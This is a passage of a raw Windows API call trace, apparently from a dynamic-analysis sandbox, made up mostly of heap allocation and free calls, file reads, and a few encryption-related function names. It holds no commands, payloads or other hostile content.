HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0180.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0180.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0180.308] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0180.308] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x5acd, lpOverlapped=0x0) returned 1 [0180.311] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0180.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0180.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5acd) returned 0x900318 [0180.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0180.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0180.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0180.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5acd) returned 0xbea018 [0180.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900318 | out: hHeap=0x8a0000) returned 1 [0180.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.312] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0180.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0180.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5acd) returned 0x900318 [0180.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900318 | out: hHeap=0x8a0000) returned 1 [0180.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0180.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.313] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0180.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0180.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0180.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0180.314] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0180.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.314] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0180.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0180.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0180.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0180.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0180.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5acd) returned 0x900318 [0180.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0180.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0180.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0180.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0180.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0180.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0180.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5acd) returned 0xbefaf0 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0180.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0180.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.318] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0180.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0180.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0180.318] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0180.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0180.319] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0180.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0180.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2728 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0180.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0180.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0180.319] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0180.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0180.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.320] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0180.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0180.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0180.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0180.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0180.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0180.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.321] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0180.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0180.322] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0180.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0180.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0180.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0180.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0180.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.323] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0180.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdac8 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0180.323] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0180.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0180.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0180.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0180.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0180.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0180.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0180.324] HeapFree (in: 